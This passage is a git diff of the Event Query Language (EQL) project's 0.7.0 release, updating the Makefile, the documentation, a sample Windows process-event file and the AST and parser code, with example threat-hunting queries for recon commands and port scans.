+++ b/Makefile @@ -2,36 +2,83 @@ ### EQL ################# -VENV := ./eql-env +VENV := ./env/eql-build VENV_BIN := $(VENV)/bin PYTHON := $(VENV_BIN)/python -PIP := $(VENV_BIN)/pip +PIP := $(PYTHON) -m pip +SPHINXBUILD ?= $(VENV_BIN)/sphinx-build +VERSION ?= -init: +PARSER_FILE := eql/_parsergen.py + + +$(VENV): pip install virtualenv virtualenv $(VENV) - $(VENV_BIN)/pip install -q -r requirements.txt + $(PIP) install -q -r requirements.txt + $(PIP) install setuptools -U + + +$(PARSER_FILE): $(VENV) + $(PYTHON) -m tatsu eql/etc/eql.ebnf -o $(PARSER_FILE) + +.PHONY: parser +parser: $(PARSER_FILE) + +.PHONY: clean clean: - rm -rf $(VENV) *.egg-info .eggs *.egg htmlcov build dist .build .tmp .tox + rm -rf $(VENV) *.egg-info .eggs *.egg htmlcov build dist .build .tmp .tox *.egg-info .coverage coverage.xml junit.xml .pytest_cache $(PARSER_FILE) + find . -type f -name '*.pyc' -delete + find . -type f -name '__pycache__' -delete + +.PHONY: testdeps +testdeps: + $(PIP) install -r requirements_test.txt -test: +.PHONY: pytest +pytest: $(VENV) parser testdeps $(PYTHON) setup.py -q test -lint: + +.PHONY: pylint +pylint: $(VENV) parser testdeps $(PYTHON) setup.py -q lint -sdist: + +.PHONY: test +test: $(VENV) pylint pytest + + +.PHONY: sdist +sdist: $(VENV) parser $(PYTHON) setup.py sdist -bdist_egg: + +.PHONY: bdist_egg +bdist_egg: $(VENV) parser $(PYTHON) setup.py bdist_egg -bdist_wheel: + +.PHONY: bdist_wheel +bdist_wheel: $(VENV) parser $(PYTHON) setup.py bdist_wheel + +.PHONY: install +install: $(VENV) parser + $(PYTHON) setup.py install + +.PHONY: all +all: sdist + .PHONY: docs -docs: +docs: $(VENV) install $(PIP) install sphinx sphinx_rtd_theme - $(PYTHON) setup.py install - $(VENV_BIN)/activate; cd docs; make html + cd docs && ../$(SPHINXBUILD) -M html . _build + + +.PHONY: upload +upload: $(VENV) + $(PIP) install twine~=1.13 + $(VENV_BIN)/twine upload dist/* diff --git a/README.md b/README.md index d964e45..cd0a0f7 100644 --- a/README.md +++ b/README.md @@ -1,7 +1,11 @@ # Event Query Language -See https://eql.readthedocs.io for documentation +[![PyPI](https://img.shields.io/pypi/v/eql.svg)](https://pypi.python.org/pypi/eql) +[![Gitter](https://badges.gitter.im/eventquerylang/community.svg)](https://gitter.im/eventquerylang/community?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge) +[![Documentation](https://readthedocs.org/projects/eql/badge/?version=latest)](https://eql.readthedocs.io/en/latest/?badge=latest) -![](docs/_static/eql-whoami.jpg "What is EQL") +[![Twitter Follow](https://img.shields.io/twitter/follow/eventquerylang.svg?style=social)](https://twitter.com/eventquerylang) + +![What is EQL?](docs/_static/eql-whoami.jpg) Browse a [library of EQL analytics](https://eqllib.readthedocs.io) # Getting Started @@ -16,18 +20,18 @@ If Python is configured and already in the PATH, then ``eql`` will be readily av ```console $ eql --version -eql 0.6.3 +eql 0.7.0 ``` From there, try a [sample json file](docs/_static/example.json) and test it with EQL. ```console $ eql query -f example.json "process where process_name == 'explorer.exe'" -{"command_line": "C:\\Windows\\Explorer.EXE", "event_subtype_full": "already_running", "event_type_full": "process_event", "md5": "ac4c51eb24aa95b77f705ab159189e24", "opcode": 3, "pid": 2460, "ppid": 3052, "process_name": "explorer.exe", "process_path": "C:\\Windows\\explorer.exe", "serial_event_id": 34, "timestamp": 131485997150000000, "unique_pid": 34, "unique_ppid": 0, "user_domain": "research", "user_name": "researcher"} +{"command_line": "C:\\Windows\\Explorer.EXE", "event_type": "process", "md5": "ac4c51eb24aa95b77f705ab159189e24", "pid": 2460, "ppid": 3052, "process_name": "explorer.exe", "process_path": "C:\\Windows\\explorer.exe", "subtype": "create", "timestamp": 131485997150000000, "user": "research\\researcher", "user_domain": "research", "user_name": "researcher"} ``` # Next Steps - Browse a [library of EQL analytics](https://eqllib.readthedocs.io) - Check out the [query guide](https://eql.readthedocs.io/en/latest/query-guide/index.html) for a crash course on writing EQL queries -- View usage for the [CLI](https://eql.readthedocs.io/en/latest/cli.html) +- View usage for interactive [shell](https://eql.readthedocs.io/en/latest/cli.html) - Explore the [API](https://eql.readthedocs.io/en/latest/api/index.html) for advanced usage or incorporating EQL into other projects diff --git a/docs/_static/example.json b/docs/_static/example.json index 2832a60..d0ece8b 100644 --- a/docs/_static/example.json +++ b/docs/_static/example.json @@ -1,124 +1,103 @@ [ { - "event_subtype_full": "already_running", - "event_type_full": "process_event", - "opcode": 3, + "event_type": "process", "parent_process_name": "System Idle Process", "pid": 4, "process_name": "System", - "serial_event_id": 2, + "subtype": "create", "timestamp": 131485996510000000, - "unique_pid": 2, - "unique_ppid": 1, + "user": "NT AUTHORITY\\SYSTEM", "user_domain": "NT AUTHORITY", "user_name": "SYSTEM" }, { "command_line": "wininit.exe", - "event_subtype_full": "already_running", - "event_type_full": "process_event", + "event_type": "process", "md5": "94355c28c1970635a31b3fe52eb7ceba", - "opcode": 3, "pid": 424, "ppid": 364, "process_name": "wininit.exe", "process_path": "C:\\Windows\\System32\\wininit.exe", - "serial_event_id": 5, + "subtype": "create", "timestamp": 131485996510000000, - "unique_pid": 5, - "unique_ppid": 0, + "user": "NT AUTHORITY\\SYSTEM", "user_domain": "NT AUTHORITY", "user_name": "SYSTEM" }, { "command_line": "winlogon.exe", - "event_subtype_full": "already_running", - "event_type_full": "process_event", + "event_type": "process", "md5": "1151b1baa6f350b1db6598e0fea7c457", - "opcode": 3, "pid": 472, "ppid": 416, "process_name": "winlogon.exe", "process_path": "C:\\Windows\\System32\\winlogon.exe", - "serial_event_id": 7, + "subtype": "create", "timestamp": 131485996510000000, - "unique_pid": 7, - "unique_ppid": 0, + "user": "NT AUTHORITY\\SYSTEM", "user_domain": "NT AUTHORITY", "user_name": "SYSTEM" }, { "command_line": "C:\\Windows\\system32\\services.exe", - "event_subtype_full": "already_running", - "event_type_full": "process_event", + "event_type": "process", "md5": "24acb7e5be595468e3b9aa488b9b4fcb", - "opcode": 3, "parent_process_name": "wininit.exe", "parent_process_path": "C:\\Windows\\System32\\wininit.exe", "pid": 524, "ppid": 424, "process_name": "services.exe", "process_path": "C:\\Windows\\System32\\services.exe", - "serial_event_id": 8, + "subtype": "create", "timestamp": 131485996520000000, - "unique_pid": 8, - "unique_ppid": 5, + "user": "NT AUTHORITY\\SYSTEM", "user_domain": "NT AUTHORITY", "user_name": "SYSTEM" }, { "command_line": "C:\\Windows\\system32\\lsass.exe", - "event_subtype_full": "already_running", - "event_type_full": "process_event", + "event_type": "process", "md5": "7554a1b82b4a222fd4cc292abd38a558", - "opcode": 3, "parent_process_name": "wininit.exe", "parent_process_path": "C:\\Windows\\System32\\wininit.exe", "pid": 536, "ppid": 424, "process_name": "lsass.exe", "process_path": "C:\\Windows\\System32\\lsass.exe", - "serial_event_id": 9, + "subtype": "create", "timestamp": 131485996520000000, - "unique_pid": 9, - "unique_ppid": 5, + "user": "NT AUTHORITY\\SYSTEM", "user_domain": "NT AUTHORITY", "user_name": "SYSTEM" }, { "command_line": "C:\\Windows\\Explorer.EXE", - "event_subtype_full": "already_running", - "event_type_full": "process_event", + "event_type": "process", "md5": "ac4c51eb24aa95b77f705ab159189e24", - "opcode": 3, "pid": 2460, "ppid": 3052, "process_name": "explorer.exe", "process_path": "C:\\Windows\\explorer.exe", - "serial_event_id": 34, + "subtype": "create", "timestamp": 131485997150000000, - "unique_pid": 34, - "unique_ppid": 0, + "user": "research\\researcher", "user_domain": "research", "user_name": "researcher" }, { "command_line": "\"C:\\Windows\\system32\\cmd.exe\" ", - "event_subtype_full": "already_running", - "event_type_full": "process_event", + "event_type": "process", "md5": "5746bd7e255dd6a8afa06f7c42c1ba41", - "opcode": 3, "parent_process_name": "explorer.exe", "parent_process_path": "C:\\Windows\\explorer.exe", "pid": 2864, "ppid": 2460, "process_name": "cmd.exe", "process_path": "C:\\Windows\\System32\\cmd.exe", - "serial_event_id": 39, + "subtype": "create", "timestamp": 131491838190000000, - "unique_pid": 39, - "unique_ppid": 34, + "user": "research\\researcher", "user_domain": "research", "user_name": "researcher" } -] +] \ No newline at end of file diff --git a/docs/api/ast.rst b/docs/api/ast.rst index a82f245..78816f3 100644 --- a/docs/api/ast.rst +++ b/docs/api/ast.rst @@ -10,9 +10,12 @@ Abstract Syntax Tree .. autoclass:: eql.ast.EqlNode -.. autoclass:: eql.ast.AstWalker +.. autoclass:: eql.ast.Walker :members: +.. autoclass:: eql.walkers.RecursiveWalker +.. autoclass:: eql.walkers.DepthFirstWalker + .. autoclass:: eql.ast.Expression .. autoclass:: eql.ast.Literal .. autoclass:: eql.ast.TimeRange @@ -34,14 +37,14 @@ Abstract Syntax Tree .. autoclass:: eql.ast.Sequence .. autoclass:: eql.ast.PipeCommand -.. autoclass:: eql.ast.ByPipe -.. autoclass:: eql.ast.HeadPipe -.. autoclass:: eql.ast.TailPipe -.. autoclass:: eql.ast.SortPipe -.. autoclass:: eql.ast.UniquePipe -.. autoclass:: eql.ast.CountPipe -.. autoclass:: eql.ast.FilterPipe -.. autoclass:: eql.ast.UniqueCountPipe +.. autoclass:: eql.pipes.ByPipe +.. autoclass:: eql.pipes.HeadPipe +.. autoclass:: eql.pipes.TailPipe +.. autoclass:: eql.pipes.SortPipe +.. autoclass:: eql.pipes.UniquePipe +.. autoclass:: eql.pipes.CountPipe +.. autoclass:: eql.pipes.FilterPipe +.. autoclass:: eql.pipes.UniqueCountPipe .. autoclass:: eql.ast.PipedQuery .. autoclass:: eql.ast.EqlAnalytic diff --git a/docs/cli.rst b/docs/cli.rst index 384b8a1..563bfa9 100644 --- a/docs/cli.rst +++ b/docs/cli.rst @@ -1,12 +1,41 @@ .. include:: links.rst ====================== -Command-Line Utility +Interactive Shell ====================== -The EQL python package provides a command line interface that will stream over `JSON`_, -and output as matches are found. An input file can be provided with ``-f`` in JSON or as lines of JSON (``.jsonl``). -Lines of JSON can also be processed as streams from stdin. +The EQL python package provides an interactive shell for data exploration, +as well as commands to directly search over `JSON`_ and output matches to +the console. First install Python and then use ``pip`` to install EQL. + +.. code-block:: console + + $ pip install eql + + +For the optimal shell experience, use Python 3.6+ and install the optional dependencies for EQL: + +.. code-block:: console + + $ pip install eql[cli] + +Once the shell is installed. Run the ``eql`` command to interact with and search data sets. +Type ``help`` within the shell to get a list of commands and ``exit`` when finished. + +|asciicast| + +.. |asciicast| image:: https://asciinema.org/a/259453.svg + :target: https://asciinema.org/a/259453 + +.. note:: + + In Python 2.7, the argument parsing is a little different. Instead of running ``eql`` directly + to invoke the interactive shell, run ``eql shell``. + + +In addition, the ``query`` command within EQL will stream over `JSON`_, and +output as matches are found. An input file can be provided with ``-f`` in JSON +or as lines of JSON (``.jsonl``). Lines of JSON can also be processed as streams from stdin. .. code-block:: console diff --git a/docs/conf.py b/docs/conf.py index 4cfe091..7fbcd44 100644 --- a/docs/conf.py +++ b/docs/conf.py @@ -179,67 +179,9 @@ # -- Extension configuration ------------------------------------------------- - -# Write a custom lexer for EQL to integrate with Pygments and get syntax highlighting -from pygments.lexer import RegexLexer, bygroups, include -from pygments import token +from eql.highlighters import EqlLexer from sphinx.highlighting import lexers -from eql.ast import PipeCommand -from eql.functions import builtins - - -class EqlLexer(RegexLexer): - name = 'eql' - aliases = ['eql'] - filenames = ['.eql'] - - _sign = r'[\-+]' - _integer = r'\d+' - _float = r'\d*\.\d+([Ee][-+]?\d+)?' - _time_units = 's|sec\w+|m|min\w+|h|hour|hr|d|day' - _name = r'[a-zA-Z][_a-zA-Z0-9]*' - _pipe_names = set(PipeCommand.lookup.keys()) - - tokens = { - 'whitespace': [ - (r'//(\n|[\w\W]*?[^\\]\n)', token.Comment.Single), - (r'/[*][\w\W]*?[*]/', token.Comment.Multiline), - (r'/[*][\w\W]*', token.Comment.Multiline), - (r'\s+', token.Text), - ], - 'root': [ - include('whitespace'), - (r'(and|in|not|or)\b', token.Operator.Word), # Keyword.Pseudo can also work - (r'(join|sequence|until|where)\b', token.Keyword), - (r'(const)(\s+)(%s)\b' % _name, bygroups(token.Keyword.Declaration, token.Whitespace, token.Name.Constant)), - (r'(macro)(\s+)(%s)\b' % _name, bygroups(token.Keyword.Declaration, token.Whitespace, token.Name.Constant)), - (r'(by|of|with)\b', token.Keyword.QueryModifier), - (r'(true|false|null)\b', token.Name.Builtin), - - # built in pipes - (r'(\|)(\s*)(%s)' % '|'.join(_pipe_names), bygroups(token.Operator, token.Whitespace, token.Name.Function.Magic)), - - # built in functions - (r'(%s)(\s*\()' % '|'.join(builtins), bygroups(token.Name.Function, token.Text)), - - # all caps names - (r'[A-Z][_A-Z0-9]+\b', token.Name.Other), - (_name, token.Name), - - # time units - (r'(%s|%s)[ \t]*(%s)\b' % (_float, _integer, _time_units), token.Literal.Date), - - (_sign + '?' + _float, token.Number.Float), - (_sign + '?' + _integer, token.Number.Integer), - - (r'"(\\[btnfr"\'\\]|[^\r\n"\\])*"', token.String), - (r"'(\\[btnfr'\"\\]|[^\r\n'\\])*'", token.String), - (r'\?"(\\"|[^"])*"', token.String.Regex), - (r"\?'(\\'|[^'])*'", token.String.Regex), - (r'(==|=|!=|<|<=|>=|>)', token.Operator), - (r'[()\[\],.]', token.Punctuation), - ] - } lexers['eql'] = EqlLexer(startinline=True) + diff --git a/docs/index.rst b/docs/index.rst index e81b78d..4fed9de 100644 --- a/docs/index.rst +++ b/docs/index.rst @@ -30,7 +30,7 @@ If Python is configured and already in the PATH, then ``eql`` will be readily av .. code-block:: console $ eql --version - eql 0.6.3 + eql 0.7.0 From there, try a :download:`sample json file <_static/example.json>` and test it with EQL. @@ -38,7 +38,8 @@ From there, try a :download:`sample json file <_static/example.json>` and test i $ eql query -f example.json "process where process_name == 'explorer.exe'" - {"command_line": "C:\\Windows\\Explorer.EXE", "event_subtype_full": "already_running", "event_type_full": "process_event", "md5": "ac4c51eb24aa95b77f705ab159189e24", "opcode": 3, "pid": 2460, "ppid": 3052, "process_name": "explorer.exe", "process_path": "C:\\Windows\\explorer.exe", "serial_event_id": 34, "timestamp": 131485997150000000, "unique_pid": 34, "unique_ppid": 0, "user_domain": "research", "user_name": "researcher"} + {"command_line": "C:\\Windows\\Explorer.EXE", "event_type": "process", "md5": "ac4c51eb24aa95b77f705ab159189e24", "pid": 2460, "ppid": 3052, "process_name": "explorer.exe", "process_path": "C:\\Windows\\explorer.exe", "subtype": "create", "timestamp": 131485997150000000, "user": "research\\researcher", "user_domain": "research", "user_name": "researcher"} + Next Steps @@ -58,6 +59,7 @@ Next Steps cli api/index resources + licenses License ^^^^^^^^^^ diff --git a/docs/licenses.rst b/docs/licenses.rst index 2b8028c..d05c823 100644 --- a/docs/licenses.rst +++ b/docs/licenses.rst @@ -1,8 +1,5 @@ ========= License ========= - -.. include:: ../LICENSE - -.. note:: -The `EQL Analytics Library `_ has an `MIT License `_ +* The Event Query Language has an `AGPLv3 `_ License. +* The `EQL Analytics Library `_ has an `MIT License `_ diff --git a/docs/query-guide/basic-syntax.rst b/docs/query-guide/basic-syntax.rst index d3f22f4..9620ae0 100644 --- a/docs/query-guide/basic-syntax.rst +++ b/docs/query-guide/basic-syntax.rst @@ -44,8 +44,8 @@ Wildcard matching Function calls .. code-block:: eql - length(field_name) concat(user_domain, "\\", user_name) + length(command_line) > 400 add(timestamp, 300) @@ -55,6 +55,20 @@ Lookups against static or dynamic values user_name in ("Administrator", "SYSTEM", "NETWORK SERVICE") process_name in ("cmd.exe", parent_process_name) +Strings +------- +Strings are represented with single quotes ``'`` or double quotes ``"``, +with special characters escaped by a single backslash. Additionally, raw strings are +represented with a leading ``?`` character before the string, which disables escape sequences +for all characters except the quote character. + +.. code-block:: eql + + "hello world" + "hello world with 'substring'" + 'example \t of \n escaped \b characters \r etc. \f' + ?"String with literal 'slash' \ characters included" + Event Relationships diff --git a/docs/query-guide/functions.rst b/docs/query-guide/functions.rst index 23dc8bc..3903d4c 100644 --- a/docs/query-guide/functions.rst +++ b/docs/query-guide/functions.rst @@ -40,6 +40,22 @@ math, string manipulation or more sophisticated expressions to be expressed. arraySearch(my_array, item, arraySearch(item.props, p, p.level == 2)) // returns true + +.. function:: arrayCount(array, variable, expression) + + Count the number of matches in an array to an expression. + + .. code-block:: eql + + // {my_array: [{user: "root", props: [{level: 1}, {level: 2}]}, + // {user: "guest", props: [{level: 1}]}] + + arrayCount(my_array, item, item.user == "root") // returns 1 + arrayCount(my_array, item, item.props[0].level == 1) // returns 2 + arrayCount(my_array, item, item.props[1].level == 4) // returns 0 + arrayCount(my_array, item, arrayCount(item.props, p, p.level == 2) == 1) // returns 1 + + .. function:: concat(...) Returns a concatenated string of all the input arguments. @@ -56,7 +72,6 @@ math, string manipulation or more sophisticated expressions to be expressed. Checks if the string ``x`` ends with the substring ``y``. - .. function:: length(s) Returns the length of a string. Non-string values return 0. diff --git a/docs/query-guide/implementation.rst b/docs/query-guide/implementation.rst index 95936f8..2c59dc5 100644 --- a/docs/query-guide/implementation.rst +++ b/docs/query-guide/implementation.rst @@ -55,7 +55,7 @@ are independently sequenced. // nothing happens, because user has an empty state 1 {id: 4, event_type: "process", user_name: "root", process_name: "hostname"} - // sequence [2, 3] now in root's state 2 + // sequence [2, 4] now in root's state 2 // root's state 1 is empty {id: 5, event_type: "process", user_name: "root", process_name: "hostname"} @@ -65,19 +65,18 @@ are independently sequenced. // sequence [6] created in user's state 1 {id: 7, event_type: "process", user_name: "root", process_name: "whoami"} - // sequence [6] created in root's state 1 + // sequence [7] created in root's state 1 {id: 8, event_type: "process", user_name: "user", process_name: "hostname"} // sequence [6, 8] now in user's state 2 // user's state 1 is now empty {id: 9, event_type: "process", user_name: "root", process_name: "ifconfig"} - // sequence [2, 3, 7] completes the sequence for root + // sequence [2, 4, 9] completes the sequence for root // root still has [6] in state 1 {id: 10, event_type: "process", user_name: "user", process_name: "ifconfig"} - // sequence [6, 8, 10] completes the sequence for root + // sequence [6, 8, 10] completes the sequence for user {id: 11, event_type: "process", user_name: "root", process_name: "ifconfig"} // nothing happens because root has an empty state 2 - diff --git a/docs/query-guide/pipes.rst b/docs/query-guide/pipes.rst index f02574a..c664a7c 100644 --- a/docs/query-guide/pipes.rst +++ b/docs/query-guide/pipes.rst @@ -127,21 +127,27 @@ Get the top five network connections that transmitted the most data ``window`` --------- The ``window`` pipe will buffer events based on the timespan specify, which allows other pipes to function on a sliding -window. - -Get suspicious recon commands that were executed within a 5 minute window +window. This allows pipes to function when streaming data continuously. +Find suspicious recon commands that were executed within a 5 minute window .. code-block:: eql process where process_name in ("whoami.exe", "netstat.exe", "hostname.exe", "net.exe", "sc.exe", "systeminfo.exe") | window 5m - | unique hostname, process_name - | unique_count process_name + | unique process_name + | unique_count | filter count >= 3 +Find processes that have network connections to a single host with over 100 unique ports within a 10 second window + .. code-block:: eql + + network where destination_address in ("10.*", "172.*", "192.*") + | window 10s + | unique_count process_name, destination_port + | filter count >= 100 + .. note:: - The window buffer will emit the most recent event first, as this will provide a stream of events when using - ``unique`` pipe or ``unique_count`` pipe. However, this means when using ``filter`` pipe in the example above, - the first few events may be absent, e.g. ``filter count >= 3`` will not show the first two events in the output - results. + The window pipe will emit all events within the window buffer from the first event, meaning events will appear like + so: [[1], [1,2], [1,2,3], ...]. Therefore, it is recommended to use a combination of ``unique_count`` and + ``filter`` to only show events over a certain threshold. diff --git a/docs/resources.rst b/docs/resources.rst index 0e1bf3c..6576204 100644 --- a/docs/resources.rst +++ b/docs/resources.rst @@ -1,8 +1,28 @@ -========= +=========== Resources -========= +=========== -- Atomic Friday with EQL (`slides <_static/eql-crash-course.slides.html>`_) (`notebook <_static/eql-crash-course.ipynb>`_) (`pdf <_static/eql-crash-course.pdf>`_) -- Introducing Event Query Language (`blog `_) -- EQL for the Masses (`blog `_) -- Getting Started with EQL (`blog `_) + +Blogs +^^^^^ +* `EQL's Highway to Shell `__ +* `Getting Started with EQL `__ +* `EQL For the Masses `__ +* `Introducing EQL `__ + + +Presentations +^^^^^^^^^^^^^ +* BlackHat 2019: `Fantastic Red-Team Attacks and How to Find Them `__ +* BSIDES SATX 2019: `The Hunter Games: How to Find the Adversary with EQL `__ +* Circle City Con 2019: `The Hunter Games: How to Find the Adversary with EQL `__ +* Atomic Friday: `Endgame on EQL `__ + (`slides `__, + `notebook <_static/eql-crash-course.ipynb>`__) +* MITRE ATT&CKâ„¢con: `From Technique to Detection `__ + + +Additional Resources +^^^^^^^^^^^^^^^^^^^^ +* Event Query Language (`docs `__, `code `__) +* EQL Analytics Library (`docs `__, `code `__) diff --git a/eql/__init__.py b/eql/__init__.py index a73de2a..841e021 100644 --- a/eql/__init__.py +++ b/eql/__init__.py @@ -1,34 +1,121 @@ """Event Query Language library.""" -from .engines import PythonEngine -from .errors import EqlError, ParseError, SchemaError +from . import ast +from . import functions +from . import pipes +from .build import ( + get_engine, + get_post_processor, + get_reducer, + render_analytic, + render_analytics, + render_engine, + render_query, + +) +from .engine import PythonEngine +from .errors import ( + EqlCompileError, + EqlError, + EqlParseError, + EqlSchemaError, + EqlSemanticError, + EqlSyntaxError, + EqlTypeMismatchError, +) +from .events import Event, AnalyticOutput +from .loader import ( + load_analytic, + load_analytics, + save_analytic, + save_analytics, +) from .parser import ( + allow_enum_fields, get_preprocessor, + ignore_missing_fields, + ignore_missing_functions, + parse_analytic, + parse_analytics, parse_definitions, parse_expression, + parse_field, + parse_literal, parse_query, - parse_analytic, - parse_analytics, + strict_field_schema, +) +from .schema import Schema +from .transpilers import ( + BaseEngine, + BaseTranspiler, + NodeMethods, + TextEngine, +) +from .utils import ( + ParserConfig, + is_stateful, + load_dump, + load_extensions, + save_dump, +) +from .walkers import ( + ConfigurableWalker, + DepthFirstWalker, + RecursiveWalker, + Walker, ) -from .loader import load_analytic, load_analytics -from .schema import use_schema -from . import functions -from . import ast - -__version__ = '0.6.3' +__version__ = '0.7.0' __all__ = ( "__version__", + "AnalyticOutput", + "BaseEngine", + "BaseTranspiler", + "ConfigurableWalker", + "DepthFirstWalker", + "EqlCompileError", + "EqlError", + "EqlParseError", + "EqlSchemaError", + "EqlSemanticError", + "EqlSyntaxError", + "EqlTypeMismatchError", + "Event", + "NodeMethods", + "ParserConfig", "PythonEngine", - "EqlError", "ParseError", "SchemaError", + "RecursiveWalker", + "Schema", + "TextEngine", + "Walker", + "ast", + "allow_enum_fields", + "functions", + "get_engine", + "get_post_processor", "get_preprocessor", + "get_reducer", + "ignore_missing_fields", + "ignore_missing_functions", + "is_stateful", + "load_analytic", + "load_analytics", + "load_dump", + "load_extensions", + "parse_analytic", + "parse_analytics", "parse_definitions", "parse_expression", + "parse_field", + "parse_literal", "parse_query", - "parse_analytic", - "parse_analytics", - "load_analytic", - "load_analytics", - "use_schema", - "functions", - "ast", + "pipes", + "render_analytic", + "render_analytics", + "render_engine", + "render_query", + "render_query", + "save_analytic", + "save_analytics", + "save_dump", + "strict_field_schema", ) diff --git a/eql/ast.py b/eql/ast.py index af973cb..5f0a803 100644 --- a/eql/ast.py +++ b/eql/ast.py @@ -7,14 +7,14 @@ from operator import lt, le, eq, ne, ge, gt from string import Template -from eql.utils import to_unicode, is_string, is_number - +from .functions import get_function +from .signatures import SignatureMixin +from .types import STRING, BOOLEAN, NUMBER, NULL, PRIMITIVES +from .utils import to_unicode, is_string, is_number, ParserConfig __all__ = ( # base classes "BaseNode", - "AstWalker", - "Expression", "EqlNode", @@ -47,15 +47,6 @@ # pipes "PipeCommand", - "ByPipe", - "HeadPipe", - "TailPipe", - "SortPipe", - "UniquePipe", - "CountPipe", - "FilterPipe", - "UniqueCountPipe", - "WindowPipe", # full queries "PipedQuery", @@ -119,6 +110,10 @@ def __repr__(self): return "{}({})".format(type(self).__name__, ", ".join('{}={}'.format(name, repr(slot)) for name, slot in self.iter_slots())) + def __iter__(self): + """Iterate recursively through all nodes in the tree.""" + return Walker().iter_node(self) + def __unicode__(self): """Render the AST back as a valid EQL string.""" return self.render() @@ -132,67 +127,6 @@ def __str__(self): return unicoded -class AstWalker(object): - """Base class that provides functionality for walking abstract syntax trees of eql.BaseNode.""" - - @classmethod - def walk(cls, node, func): - """Walk the syntax tree top-down, until callback returns False. - - :param BaseNode node: Any AST node - :param (BaseNode) -> bool func: Walk function - """ - if isinstance(node, BaseNode): - if not func(node): - return - - for slot, child in node.iter_slots(): - cls.walk(child, func) - elif isinstance(node, (list, tuple)): - for child in node: - cls.walk(child, func) - elif isinstance(node, dict): - for key, child in node.items(): - cls.walk(child, func) - - def transform(self, node, func, optimize=True): - """Recursively transform the syntax tree by walking bottom-up. - - :param BaseNode node: Any AST node - :param function func: Callback function for walking with the signature - ``func(original_node, transformed_node) -> bool`` - :param bool optimize: Return an optimized copy of the AST - :rtype: BaseNode - """ - if isinstance(node, BaseNode): - cls = type(node) - args = [self.transform(child, func, optimize=optimize) for _, child in node.iter_slots()] - transformed = cls(*args) - if optimize: - transformed = transformed.optimize() - - output = func(transformed, node) # type: BaseNode - - if optimize: - return output.optimize() - return output - elif isinstance(node, (list, tuple)): - return [self.transform(child, func, optimize=optimize) for child in node] - elif isinstance(node, dict): - return {key: self.transform(child, func, optimize=optimize) for key, child in node.items()} - else: - return node - - def copy(self, node, optimize=True): - """Create a copy of an AST. - - :param BaseNode node: Any valid AST - :param bool optimize: Return an optimized copy of the AST - :rtype: BaseNode - """ - return self.transform(node, lambda copy, original: copy, optimize=optimize) - - # noinspection PyAbstractClass class EqlNode(BaseNode): """The base class for all nodes within the event query language.""" @@ -254,12 +188,34 @@ class Literal(Expression): __slots__ = 'value', precedence = Expression.precedence + 1 + type_hint = PRIMITIVES def __init__(self, value): """Create an EQL value from a python value.""" - assert type(self) is not Literal, "Illegal usage of Literal AST node" + if type(self) is Literal: + raise TypeError("Literal AST nodes can't be created directly. Try Literal.from_python") self.value = value + @classmethod + def find_type(cls, python_value): + """Find the corresponding AST node type for a python value.""" + if python_value is None: + return Null + elif python_value is True or python_value is False: + return Boolean + elif is_number(python_value): + return Number + elif is_string(python_value): + return String + else: + raise TypeError("Unable to convert python value to a literal.") + + @classmethod + def from_python(cls, python_value): + """Convert a python value to a literal.""" + subcls = cls.find_type(python_value) + return subcls(python_value) + def __and__(self, other): """Shortcut ANDing of Static Value nodes together.""" if isinstance(other, Literal): @@ -286,6 +242,8 @@ def __invert__(self): class Boolean(Literal): """Boolean literal.""" + type_hint = BOOLEAN + def _render(self): return 'true' if self.value else 'false' @@ -293,6 +251,8 @@ def _render(self): class Null(Literal): """Null literal.""" + type_hint = NULL + def __init__(self, value=None): """Null literal value.""" super(Null, self).__init__(None) @@ -304,6 +264,8 @@ def _render(self): class Number(Literal): """Numeric literal.""" + type_hint = NUMBER + def _render(self): return to_unicode(self.value) @@ -323,6 +285,7 @@ class String(Literal): } reverse_patterns = {v: k for k, v in escape_patterns.items()} escape_re = r'[{}]'.format('|'.join(escape_patterns.values())) + type_hint = STRING @classmethod def escape(cls, s): @@ -410,6 +373,11 @@ def query_multiple_events(self): # type: () -> (int, Field) return self.path[0], Field(self.path[1], self.path[2:]) return 0, self + @property + def full_path(self): # type: () -> list[str] + """Get the full path for a field.""" + return [self.base] + self.path + def _render(self): text = self.base for key in self.path: @@ -437,21 +405,29 @@ def __init__(self, name, arguments): self.name = name self.arguments = arguments or [] + @property + def callback(self): + """Get the callback for this node.""" + return self.signature.get_callback(*self.arguments) + + @property + def signature(self): + """Get the matching function signature.""" + return get_function(self.name) + def optimize(self): """Optimize function calls that can be determined at compile time.""" - if self.name == 'wildcard': - if any(isinstance(arg, Literal) and not isinstance(arg, String) for arg in self.arguments): - return Boolean(False) - - if len(self.arguments) >= 2 and all(isinstance(arg, String) for arg in self.arguments): - source = self.arguments[0].value - regex = '|'.join('^{}$'.format(r'.*?'.join(re.escape(sequence) - for sequence in literal.value.split('*'))) - for literal in self.arguments[1:]) - return Boolean(re.match(regex, source, re.IGNORECASE) is not None) - elif self.name == 'length' and all(isinstance(arg, String) for arg in self.arguments): - return Number(len(*(arg.value for arg in self.arguments))) - return self + func = get_function(self.name) + arguments = [arg.optimize() for arg in self.arguments] + + if func and all(isinstance(arg, Literal) for arg in arguments): + try: + rv = func.run(*[arg.value for arg in arguments]) + return Literal.from_python(rv) + except NotImplementedError: + pass + + return FunctionCall(self.name, arguments) def render(self, precedence=None): """Convert wildcards back to the short hand syntax.""" @@ -512,6 +488,14 @@ def __init__(self, left, comparator, right): self.right = right self.function = self.func_lookup[comparator] + def __invert__(self): + """Convert a comparison by flipping the operators.""" + if self.comparator == self.EQ: + return Comparison(self.left, Comparison.NE, self.right).optimize() + elif self.comparator == self.NE: + return Comparison(self.left, Comparison.EQ, self.right).optimize() + return super(Comparison, self).__invert__() + def optimize(self): """Optimize comparisons against literal values.""" if isinstance(self.left, Literal) and isinstance(self.right, Literal): @@ -534,6 +518,24 @@ def optimize(self): return self + def __or__(self, other): + """Check for one field being compared to multiple values, and switch to a set.""" + if self.comparator == Comparison.EQ and isinstance(self.right, Literal): + if isinstance(other, Comparison) and self.left == other.left and other.comparator == Comparison.EQ: + if isinstance(other.right, Literal): + return InSet(self.left, [self.right, other.right]) + elif isinstance(other, InSet) and self.left == other.expression and other.is_literal(): + container = [self.right] + container.extend(other.container) + return InSet(self.left, container) + return super(Comparison, self).__or__(other) + + def __and__(self, other): + """Check if a comparison is ANDed to a set.""" + if self.comparator == Comparison.EQ and isinstance(other, InSet) and self.left == other.expression: + return InSet(self.left, [self.right]) & other + return super(Comparison, self).__and__(other) + class InSet(Expression): """Check if the value of a field within an event matches a list of values.""" @@ -570,14 +572,32 @@ def _get_literals(self): return values def __and__(self, other): - """Perform an 